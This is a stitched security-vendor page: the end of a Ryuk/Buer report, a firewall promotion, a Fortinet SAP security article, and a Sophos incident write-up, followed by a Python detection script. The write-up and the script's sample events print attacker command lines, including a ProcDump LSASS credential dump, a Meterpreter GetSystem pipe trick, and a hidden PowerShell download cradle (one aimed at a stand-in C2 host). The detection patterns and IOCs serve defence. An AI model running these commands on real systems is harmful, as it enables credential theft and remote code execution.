It’s clear that Ryuk is back, and that the actors behind it are evolving their methods for initial compromise, using multiple loader bots to achieve initial access. It’s not clear if the same actor is behind all of these attacks, using multiple malware-as-a-service platforms to deliver Ryuk, or if there are multiple Ryuk actors. But the similarity in techniques across these campaigns suggests that there is at least coordination between them: they use targeted emails with cloud-based malicious documents and a lure to spur immediate action (often related to wages or taxes).

The best mitigation for these attacks is to reinforce training on phishing attacks. While these malicious emails are targeted, they are usually awkwardly worded and use the target’s name in odd ways. Careful reading of the email will tip off most educated users. But these attacks are growing in sophistication, and even well-trained users may eventually click on the wrong link in an email if spam detection doesn’t catch them first.

Sophos detects and blocks Buer both with custom detections (Troj/BeurLd-A) and machine learning, and detects the spear phishing messages as spam.

Sophos would like to acknowledge the contributions of Peter Mackenzie, Elida Leite, Syed Shahram and Bill Kearny of the Sophos Rapid Response team, and Anand Ajjan, Brett Cove and Gabor Szappanos of SophosLabs for their contributions to this report.


Net Universe offers all Sophos devices and subscriptions, as well as consultant services with worldwide delivery.
Send us an email to [email protected] for more information or visit

XG Firewall v18 performance gains mean more traffic and better security – Sophos News

XG Firewall v18 includes several performance gains that will breathe new life into your network, enabling you to handle more traffic and better secure it.

If you haven’t upgraded to XG Firewall v18 already, you’re going to want to do so as soon as possible to take advantage of the substantial performance benefits waiting for you.

What are the gains and where do they come from?

Consider these potential performance boosts available by upgrading to XG Firewall v18:

Those are some impressive performance improvements!

One of the most exciting enhancements to XG Firewall in v18 was the introduction of the new Xstream Architecture, with its all-new streaming DPI engine, advanced TLS 1.3 inspection solution, and Network Flow FastPath.

Let’s look at how the Xstream Architecture upgrades your performance:

Trusted traffic FastPath acceleration

The new Xstream Network Flow FastPath is all about performance. It directs trusted traffic that doesn’t require security scanning into a fast lane through the system. This not only minimizes latency and accelerates application traffic through the firewall, it also has the added benefit of not engaging the DPI engine for deep-packet inspection of trusted traffic.

The impact of fast-pathing is up to a 5x improvement in firewall traffic throughput! Of course, with a blend of real-world traffic mixes, not all applications qualify for trusted traffic FastPath acceleration, but if a substantial portion of your traffic can be accelerated on the FastPath, you could increase your firewall’s security scanning capacity while allowing more trusted traffic. That’s a win-win.

Be sure to see how to make the most of the Network Flow FastPath on your network to learn how this works and how to set it up optimally.

TLS inspection speed

The new Xstream TLS inspection solution also brings a tremendous boost in decrypting and inspecting encrypted traffic flows, with up to a 2x improvement in performance. And when you combine the added performance with the very granular and easy-to-manage TLS inspection policies, you can be sure you’re only inspecting traffic that really needs it – and now do it faster than ever.

See how to make the most of Xstream TLS Inspection on your XG Firewall.

IMIX traffic performance

Internet Mix, or IMIX, is an often-used reference for measuring typical real-world internet traffic performance, making it a good metric to consider when evaluating a firewall.

The new Xstream architecture in XG Firewall v18 brings a substantial boost in performance to this important metric. On our mid-range firewall models, the gains are over 100%, with the average across the XG Series line being a 57% improvement in performance.

This is all thanks to optimizations in the packet processing flow, DPI engine, and Network Flow FastPath. It’s an incredible real-world improvement in traffic processing performance.

Other common traffic performance measurements also benefit from the Xstream architecture in v18, including raw firewall performance, IPS, AV, application control, and malware protection.

Get the latest XG Firewall brochure to see the latest performance metrics and how your XG Series model stacks up.

SSL VPN capacity

Further optimizations to our SSL engine in XG Firewall v18 MR3 bring some dramatic improvements to remote access SSL VPN capacity, with up to 6x the number of connections possible on our higher-end appliances.

Increases are more modest at the entry-level, but on a typical mid-range device like the XG 310, the capacity has tripled! This is great news for everyone managing a remote workforce these days.

Check out the other great enhancements with remote-access VPN.

Upgrade today

If you haven’t already, upgrade to XG Firewall v18 today. It’s a free performance boost, and you get a ton of great new protection and networking features.

Be sure to take advantage of all the resources available, including the recent “Making the Most of XG Firewall v18” article series that covers all the great new capabilities in XG Firewall v18:


Fortinet Secures the Intelligent Enterprise Running SAP

SAP is among the world’s largest software companies, with some 92% of the Forbes Global 2000 using at least some of their enterprise application solutions. Most of these companies will deploy SAP S/4HANA in the cloud—either public or private. In fact, by 2027 some SAP customers will need to migrate to SAP S/4HANA as they have announced the end-of-life of older versions of their integrated application solutions (SAP Business Suite). Fortinet’s Dynamic Cloud Security offerings provide organizations the key security elements they require to help secure their SAP S/4HANA cloud deployments during this transition.

Securing SAP Environments With Fortinet’s Dynamic Cloud Security

Properly securing any enterprise application solution, such as Enterprise Resource Planning (ERP), is increasingly important for organizations. SAP Enterprise application solutions are a suite of integrated tools used to collect, store, manage, and interpret data from many business activities. For management teams, ERP is the key to understanding and managing their business. But for cybercriminals, ERP systems are an attractive target because ERP systems share data across every facet of the organization. 

Fortinet has been working with leading ERP vendors of enterprise application solutions to provide carefully engineered and well-tested architectures for securing such systems, both in and out of the cloud. For example, Fortinet has recently published Oracle validated security architectures for Oracle solutions. Fortinet’s Dynamic Cloud Security portfolio is designed to help SAP customers secure their workloads across environments. 

“Zuellig Pharma uses Fortinet’s Dynamic Cloud Security offerings to protect our SAP deployments across public and private cloud infrastructures,” shared Daniel Laverick, Head of SAP & IT Solutions at Zuellig Pharma. “Fortinet offers the broadest set of security offerings for securing workloads both on-premises and on any cloud. With Fortinet, we’ve gained unified visibility and control without hindering our ability to deliver seamless user experience to our customers worldwide.” 

Securely Transitioning to SAP S/4HANA

A few years ago, SAP announced end-of-support for older SAP solutions by 2025, including:

  • ERP 6.0
  • Customer Relationship Management 7.0
  • Supply Chain Management 7.0
  • Supplier Relationship Management 7.0 applications
  • Business Suite powered by SAP HANA

S/4HANA was specifically designed to run in a virtualized environment like the cloud. But not all clouds are the same. As a result, there are actually different versions of the software designed for public and private cloud deployments. In many cases, customers will opt for a hybrid model, where the majority of SAP systems run in the cloud while some dedicated production systems remain on-premises. This can add complexity in terms of security across these deployments. Fortunately, Fortinet solutions support both public and private clouds, ensuring security for hybrid, multi-cloud, and on-premises environments.

“Fortinet’s Dynamic Cloud Security portfolio—including FortiWeb and FortiCWP—enables our customers to confidently secure their SAP data and applications,” shared Thomas Grimm, CEO at AddOn AG – Germany. “Through Fortinet, SAP workloads are protected consistently across the application, network, and platform stack, addressing the expanded attack surface with a consistent offering.”

Christian Steden, Managing Director at Evonet said, “As a Fortinet partner, Evonet provides our customers Fortinet’s broad range of advanced security technologies to protect their SAP deployments. Fortinet’s offerings natively integrate with SAP, enabling automated, centralized management and visibility that reduces management overhead for our customers.”

Addressing the ERP Threat Landscape with Fortinet’s Dynamic Cloud Security

ERP systems can be a target for bad actors as they provide access to a vast range of business information systems, including financial data, production systems, development, employee data, and more. Some of these attacks could be aimed at well-known SAP apps such as Fiori—S/4HANA’s web interface, the new user experience (UX) for SAP software and applications. It provides access to a set of applications that are used in regular business functions, like work approvals, financial apps, calculation apps, and various self-service apps. For organizations looking to enhance the security for their SAP deployments, Fortinet’s Dynamic Cloud security offerings provide visibility and control across cloud infrastructures, ensuring secure connectivity from the data center to the cloud. 

Consider the following to enhance the security for SAP deployments:

  1. A web-application firewall (WAF) to block web attacks, such as code injection, cross-site scripting, or SQL injection. Because these attacks may be based on zero-day threats, the WAF should utilize machine learning to differentiate between normal and abnormal traffic and should utilize sandboxing and AI-driven threat feeds to detect new attack types. The WAF should also secure API interfaces using API calls. 
  2. Cloud-based network firewalls to secure network traffic—including internal segmentation to reduce the extent of trust domains. In a zero-trust environment all traffic should be encrypted; however, doing so may introduce performance issues, so firewall performance will be a key attribute.
  3. An IPS (Intrusion Prevention System) to block attacks targeting system vulnerabilities.
  4. Data Loss Prevention tools to block sensitive or confidential information leakage.
  5. Cloud-native workload protection and/or CASB to monitor security policies, configuration, usage patterns, and compliance with security policies.

In addition to the above, endpoint protection, network access controls, central management, and centralized analytics should all be part of the security infrastructure if not already. In fact, the pillars of cybersecurity need to be brought into play—Security-Driven Networking for segmentation and securing data, Zero Trust Access (including endpoint security) to protect against identity theft-driven attacks, cloud security to secure data in the cloud and to identify misconfiguration and risk factors, and robust AI-Driven Security Operations to ensure timely threat feeds and remediation. Of course, all these should be woven into a broad, integrated, and automated cybersecurity platform, like the Fortinet Security Fabric, supported by a shared analytics and management plane.

Fortinet Can Help

Fortinet Dynamic Cloud Security Solutions can provide the necessary visibility and control across cloud infrastructures, enabling secure applications and connectivity from data center to cloud.

Fortinet recently published a white paper on securing SAP deployments detailing the tools and architecture approach for different scenarios. Learn more about how to enhance the security for your SAP S/4HANA deployment by downloading the paper.

Learn how Fortinet’s dynamic cloud security solutions provide increased visibility and control across cloud infrastructures, enabling secure applications and connectivity from data center to cloud. 

Read these customer case studies to see how Hillsborough Community College and WeLab implement Fortinet’s dynamic cloud security solutions for secure connectivity from data center to the cloud. 

Engage in our Fortinet user community (Fuse). Share ideas and feedback, learn more about our products and technology, or connect with peers.


An active adversary caught in the act – Sophos News

Customer profile: A professional sports organization based in the USA, with approximately 800 devices.

The Sophos Managed Threat Response (MTR) team provides 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service.

The initial clue: A needle among the hay

In the hunt for suspicious events, the Sophos MTR team analyzes tens of millions of data points each day by leveraging threat intelligence, machine learning, and complex rule sets derived from the front-line experience that operators have gained from responding to threats day in, day out. This analysis is done with the goal of finding signals that could potentially be an indicator of an attack.

In this case, the signal was a legitimate Microsoft Sysinternals tool, ProcDump.exe – a tool typically used by developers to analyze running software processes and to write (or ‘dump’) their memory to disk so that it can be inspected. Developers find this tool very handy for figuring out why a bug is occurring.

Yet in this instance, ProcDump was attempting to export the memory space of lsass.exe. This raised alarm bells with the Sophos MTR operations team, which monitors the customer environment 24/7.

LSASS is the Local Security Authority Subsystem Service in Microsoft Windows and it is responsible for enforcing security policy and handling logins to Windows systems. If one were to write its memory to disk, the usernames and passwords of users could be retrieved from it.

The Sophos MTR team had indeed spotted an indicator of attack. Someone was trying to steal credentials.

You may have heard of Mimikatz, a tool whose sole purpose is stealing passwords, hashes, security tokens, and so on. Adversaries sometimes avoid using this tool given its widespread detection by security products. But unlike Mimikatz, ProcDump has legitimate uses beyond just the nefarious, and thus is rarely detected by security vendors.

Someone was trying to not get caught.

The investigation begins

A case was created the same minute as the signal was generated, and a Sophos MTR operator immediately began to investigate.

Attempted credential theft

The operator looked into the historic data gathered by our agent and found the process that caused the detection. The process was trying to invoke a command:

C:\Windows\system32\cmd.exe /C wmic /node:"SERVER NAME" process call create "C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp"

The command shows the Windows command-line interpreter cmd.exe attempting to use WMIC – the interface for Windows Management Instrumentation. WMI is a tool for interacting with local and remote systems to get information and send them instructions.

Calling out to a remote server (redacted to SERVER NAME), the command was trying to tell the server to run ProcDump and write the LSASS process’ memory to disk.

Thankfully the MTR operator found no evidence that “lsass.dmp” was written to disk, and a review of their Sophos Central telemetry showed Sophos credential theft prevention technology successfully thwarted the adversary’s attempt.

But where did this command come from?

Attempted privilege escalation

The operator looked back up the process tree to find the parent of (i.e. what started) cmd.exe and found svchost.exe – the Windows Service Host that is used to run single processes and conserve computing resources.

The same instance of svchost also spawned another child process:

C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7

To the untrained eye, the above command doesn’t appear obviously malicious. Yet this is a common artifact that can be observed from the GetSystem function of Meterpreter.

The Meterpreter is a payload that gives an adversary interactive command-line access to a host and GetSystem is a script built into the Meterpreter that aids an adversary in gaining full system privileges by impersonating a named pipe – a technology to enable processes to communicate with one another.

Thankfully the named pipe they were trying to exploit didn’t exist on the system at that time.

Command and control

Since the adversary was using Meterpreter, they must have had some kind of network connection over which to send their commands to the compromised host.

Digging into the network logs, the MTR operator could see a large number of outbound connections to a Bulgarian IP address on network port 443.

Port 443 is typically used by HTTPS for securely connecting to websites, and adversaries commonly use this port to hide themselves among legitimate web traffic.

This discovery initiated a review of this Bulgarian-based IP. One of the ports it had open to the internet is port 50050. This port is an ephemeral port – one that cannot be registered with IANA and thus is not a common port used by well-known network services. However, the MTR operator had seen this port many times before.

Port 50050 is the default listening port for a Cobalt Strike listening server. Cobalt Strike is a “threat emulation” tool typically marketed to penetration testers to easily facilitate adversarial attacks and help organizations see their risk to breaches.

However, malicious threat actors have gotten their hands on this tool and use it to orchestrate real attacks on innocent victims.

Notifying the customer

Only minutes after the initial detection was made, the MTR operator completed the initial investigation and had high confidence that this was malicious adversarial activity.

Sophos MTR offers three modes of response to customers that they can switch between at any time:

Notify – Sophos conducts threat identification and investigation, informing the customer of the findings and offering the customer recommendations for how to respond to the threat themselves.

Collaborate – Sophos conducts threat identification and investigation, and collaborates on the response to the threat, dividing responsibility between the customer and the Sophos MTR team.

Authorize – Sophos conducts threat identification, investigation, and response and takes proactive action, informing the customer about what was detected and the response actions that were taken.

In this instance, the MTR customer was in Notify mode. The operator reached out to the customer via phone to discuss the discovery and to provide recommendations for how to respond to the immediate findings before the investigation continued.

The MTR operator shared the discoveries and the user accounts leveraged by the adversary. These accounts needed their passwords reset immediately to disable the adversary’s access. In addition to the phone call, all the details were provided in an email to be referenced while the customer took action.

Continuing the hunt

With the customer working on resetting the compromised accounts’ passwords, the MTR operator continued to follow the adversary’s journey across the customer’s network. At this point, no evidence had been found as to how they got inside.

Note that throughout the rest of this case, regular communication between the MTR operator and the customer took place via email.

Lurking in the cloud

Deeper analysis of the network traffic on the compromised host showed HTTPS traffic between the host and another that resided in the customer’s virtual private cloud (VPC), where they have a number of servers that face the public internet.

Diving into the logs of the server in the VPC, the MTR operator quickly spotted further GetSystem attempts and named pipe impersonation. However, all evidence pointed towards the already identified compromised hosts.

Additionally, a PowerShell (a scripting language built into Windows for use with task automation) command execution was identified:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"

This one-line command reaches out to a URL and downloads and executes a payload it finds there. The URL points to the same Bulgarian IP where the MTR team found the open ports for Cobalt Strike.

The MTR operator quickly reached out to SophosLabs, Sophos’ threat analysis, intelligence, and research division. Sharing the above command, the MTR operator asked for assistance with analyzing the payload hosted at that URL. Within a few minutes, SophosLabs shared their insights back with Sophos MTR.

Unfortunately, the payload in question was no longer present: seemingly taken down by the adversary shortly after they used it. SophosLabs promptly added the IP and the URL to the cloud intelligence platform that underpins all Sophos products and services so that any further use of that command and control server will be detected and blocked across all Sophos customers.

Finding the initial access

Finally, the MTR operator identified where the attack began. Continuing the analysis of the VPC server’s network logs, Remote Desktop Protocol (RDP) communication to an unknown host was spotted within the VPC. This unknown host was not under management by Sophos MTR, nor could it be found in the customer’s Sophos Central account.

The operator reached out to the customer to ask what this unknown host was and why it wasn’t under management.

It seems they decommissioned it too late. The adversary had laterally moved from the original compromised host to another and executed the PowerShell command. This gave them remote access to a new host in the event they lost their access via RDP.

This turned out to be a smart move by the adversary, as this is exactly what happened.

RDP servers far too often face the public internet, making them a prime target of adversaries looking to break into networks. Once inside, RDP is a noisy and visual method of having remote access. Moving cursors on the screen are somewhat of a giveaway.

The first thing an adversary will look to do is to move laterally, to another host, and install a reverse shell – a way to have that host call back to them and give them command line access. Using the command line is a far more stealthy method of remote access, allowing them to hide in the background even while a user is logged in and using the host.

As to what the adversary’s goals were, these are unknown. The MTR operators identified the attacker long before they were able to act on their objectives, catching them while they were still in the network propagation stage, moving laterally and attempting to escalate their privileges.

Following the investigation, the MTR operators continued to monitor the customer’s estate for this specific threat for seven more days, identifying no further malicious or suspicious activity.

The MTR team then concluded that the adversary had been successfully ejected from the network.

Case closed. On to the next.

Learn more

For more information on the Sophos MTR service, visit our website or speak with a Sophos representative.

If you prefer to conduct your own threat hunts, Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Start a 30-day no obligation trial today.


  • ProcDump of LSASS: C:\Windows\system32\cmd.exe /C wmic /node:"SERVER NAME" process call create "C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp"
  • Meterpreter GetSystem: C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7
  • C2 IPv4:
  • C2 payload URL:
  • C2 port (Cobalt Strike): 50050
  • PowerShell to download and invoke Cobalt Strike payload: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"
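Detection logic for the command-line artifacts this case hinges on, together with the Defender-exclusion and execution-policy changes described in the Buer loader article earlier on this page, as an added example that is not part of either Sophos report. The rule names, regexes, host names and log records are constructed for illustration, and c2.example.invalid stands in for the redacted payload URL.

```python
"""Detection logic for the process command lines quoted in this report.

Rules cover the MTR case (ProcDump on LSASS via WMIC, the Meterpreter GetSystem
named-pipe echo, a hidden PowerShell download cradle) and the Buer article on
this page (Add-MpPreference exclusions, Set-ExecutionPolicy Bypass).
All events are constructed for illustration, not customer telemetry.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    severity: str
    cmd: str


# (rule name, severity, pattern); case-insensitive because cmd.exe and PowerShell are.
RULES = [
    # procdump ... -ma lsass : full memory dump of the LSASS process
    ("procdump_lsass", "high",
     re.compile(r"procdump(\.exe)?\b.*\s-ma\s+lsass\b", re.I)),
    # wmic /node:<host> process call create : launching a process on a remote host
    ("wmic_remote_process_create", "medium",
     re.compile(r"\bwmic\b.*/node:.*\bprocess\s+call\s+create\b", re.I)),
    # cmd /c echo <token> > \\.\pipe\<name> : Meterpreter GetSystem artifact
    ("getsystem_named_pipe_echo", "high",
     re.compile(r"\becho\s+\S+\s*>\s*\\\\\.\\pipe\\\S+", re.I)),
    # powershell -w hidden ... IEX(...downloadstring(...)) : download cradle
    ("powershell_download_cradle", "high",
     re.compile(r"powershell(\.exe)?.*\s-w(indowstyle)?\s+hidden\b.*"
                r"(IEX|Invoke-Expression).*downloadstring", re.I)),
    # Add-MpPreference -ExclusionPath : hiding a folder from Defender (Buer)
    ("defender_exclusion_added", "medium",
     re.compile(r"add-mppreference\b.*-exclusionpath", re.I)),
    # Set-ExecutionPolicy Bypass : silencing script-policy checks (Buer)
    ("executionpolicy_bypass", "low",
     re.compile(r"set-executionpolicy\b.*\bbypass\b", re.I)),
]

# Constructed process-creation records modelled on the commands in the report;
# c2.example.invalid stands in for the URL the report redacts.
SAMPLE_EVENTS = [
    {"host": "WS-01", "parent": "svchost.exe",
     "cmd": r'C:\Windows\system32\cmd.exe /C wmic /node:"SERVER NAME" process call '
            r'create "C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp"'},
    {"host": "WS-01", "parent": "svchost.exe",
     "cmd": r"C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7"},
    {"host": "VPC-WEB-02", "parent": "cmd.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden '
            r'''-c "IEX ((new-object net.webclient).downloadstring('http://c2.example.invalid/a'))"'''},
    # Buer-style defence tampering under a dropper parent (constructed)
    {"host": "WS-07", "parent": "print_document.exe",
     "cmd": r'powershell.exe -Command "Add-MpPreference -ExclusionPath C:\ProgramData\Qd7kR"'},
    {"host": "WS-07", "parent": "print_document.exe",
     "cmd": r'powershell.exe -Command "Set-ExecutionPolicy Bypass -Scope Process"'},
    # Benign: a developer dumping their own crashing app, and a scheduled script
    {"host": "DEV-03", "parent": "explorer.exe",
     "cmd": r"C:\Tools\procdump.exe -accepteula -ma myapp.exe C:\dumps\myapp.dmp"},
    {"host": "DEV-03", "parent": "explorer.exe",
     "cmd": r"powershell.exe -File C:\scripts\backup.ps1"},
]


def match_rules(cmd):
    """Names of every rule whose pattern matches the command line, in RULES order."""
    return [name for name, _sev, pat in RULES if pat.search(cmd)]


def scan(events):
    """One Finding per (event, rule) match across all events."""
    severity = {name: sev for name, sev, _pat in RULES}
    return [Finding(ev["host"], rule, severity[rule], ev["cmd"])
            for ev in events for rule in match_rules(ev["cmd"])]


def hosts_with_chain(findings, min_rules=2):
    """Hosts that tripped at least min_rules distinct rules: one ProcDump hit may
    be a developer, but several different rules on one host look like the
    credential theft -> privilege escalation -> C2 chain seen in this case."""
    rules_by_host = {}
    for f in findings:
        rules_by_host.setdefault(f.host, set()).add(f.rule)
    return sorted(h for h, r in rules_by_host.items() if len(r) >= min_rules)


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for f in found:
        print(f"[{f.severity:>6}] {f.host:<10} {f.rule}")
    print("hosts with a multi-stage chain:", hosts_with_chain(found))
```

The benign DEV-03 records show why a single ProcDump rule is not enough on its own: the LSASS target and the clustering of distinct rules on one host are what separate this case from a developer debugging a crash.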
